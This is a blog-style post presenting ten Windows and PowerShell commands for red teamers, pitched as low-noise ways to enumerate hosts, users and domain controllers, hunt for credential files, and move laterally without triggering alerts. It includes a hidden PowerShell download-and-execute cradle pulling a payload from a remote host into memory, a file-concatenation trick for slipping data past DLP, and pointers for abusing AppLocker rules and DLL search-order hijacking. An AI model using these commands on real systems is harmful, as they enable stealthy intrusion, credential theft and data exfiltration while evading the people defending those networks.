This post is going to cover 10 Windows commands for red teamers that are less likely to trigger alerts or look suspicious. Unlike most of the recycled “hacking commands” lists filled with noisy stuff like whoami, hostname, or net user, these are actually useful or low-noise, and still work in 2025.
Great for post exploitation enumeration, internal recon or just living off the land, these are command that will help you blend in, not stick out.
1. echo %username% and echo %computername%
Purpose: Identify current user and host quietly.
echo %username%
echo %computername%Instead of using noisy enumeration tools, grab what you need from environment variables. These are built into every CMD session, and don’t require spawning extra processes.
2. Enumerate Tasklist details – tasklist /v /fo table
Purpose: Triage running processes, identify AV/EDR, check logged-in user accounts, domain.
tasklist /v /fo tableThis gives you a snapshot of every process and associated window titles. Watch for:
- AV agents (e.g.,
MsMpEng.exe,csrss.exe,CarbonBlack). - Interactive sessions (e.g., Word, Outlook, browsers = users online).
- The username column gives you a list of currently logged in users.
3. Search for Sensitive Files Fast using Dir
Purpose: Hunt for loot, credentials, configs, KeePass files using nothing but cmd.
dir C:\ /s /b *.kdbx *.xml *.config 2>nul
No need to load PowerShell or Python. This pure-CMD method gets you results quickly and quietly. Redirecting errors (2>nul) helps keep the output clean.
4. Powershell command to list SMB share files
Purpose: Enumerate files on remote SMB shares without mapping drives or triggering drive mount logs.
Get-ChildItem \\target\share\
Get-ChildItem \\target\share\ -Recurse -Filter *password*.txtThis silently lists the contents of a share, no net use, no New-PSDrive, no CMD spawning. Its a stealthier alternative to drive mapping.
5. Download & Execute Remote Code In Memory
Purpose: Execute remote payloads via PowerShell.
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://github.com/yourshell.ps1')"Host your payload on github and execute it straight into memory. If constained language mode is setup or powershell is blocked look into how to use c# to invoke powershell.
6. Hide files from DLP and Defenders via copy /b
Purpose: Bypass DLP, exfil data, or hide payloads / data in other media.
copy /b innocent.jpg + secret.zip combined.jpgThis results in a valid-looking JPG image, but can be extracted later with 7z, WinRAR, etc. A common tactic for sneakily moving data around or out.
7. Check AppLocker Bypass via Registry with Get-ChildItem
Purpose:
Identify weak AppLocker rules by scanning the registry for * wildcards in allowed paths — often used in misconfigured rules that can be abused for execution.
Get-ChildItem "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2"Looks for wildcard paths like:
C:\Users\*\AppData\Local\Temp\*C:\ProgramData\*\Tools\**\Updater\bin\*
These often indicate user-writable locations that are whitelisted by mistake giving you a place to drop and execute payloads without needing to bypass AppLocker at all.
8. Enumeration for DLL Hijack Opportunities via $Env:
Purpose:
Identify writable directories in the environment path where you can drop malicious DLLs for DLL Search Order Hijacking.
$Env:Path -split ';'This splits the system’s PATH variable into individual directories that Windows will search when loading DLLs or executing binaries without a full path.
Look for entries like:
C:\Users\username\AppData\Local\Microsoft\WindowsAppsC:\ProgramData\SomeVendor\binC:\Tools\(custom IT tools folder)- Any path that is writable by standard users
9. NLTEST to Get Domain Controller List
Purpose:
Enumerate available domain controllers in the current domain helpful for identifying targets, replication paths, or AD pivot points
nltest /dclist:domain.localThis will give you a list of the domain controllers across the domain.
10. Enumerate File Servers by Naming Convention
Purpose:
Identify file servers and storage hosts based on naming conventions perfect for mapping out high-value lateral movement targets
Get-ADComputer -Filter "Name -like '*fs*' -or Name -like '*file*'" -Properties Name,OperatingSystem | Select-Object Name,OperatingSystemThis command queries Active Directory for any computer object whose hostname contains:
- “fs” (e.g.,
DC-FS01,FS-Backup) - “file” (e.g.,
FileServer1,CORP-FILE02)
Conclusion
Most command lists online are noisy, outdated, or completely impractical in real environments. What actually works today are native, quiet, and flexible techniques that don’t rely on external tools or obvious binaries.
The commands in this post are meant to support real post-exploitation, recon, and lateral movement without triggering every alert in the stack. If you’re red teaming in 2025, knowing how to move through Windows with minimal noise is more important than ever.
Test them, adapt them, and use what fits your environment.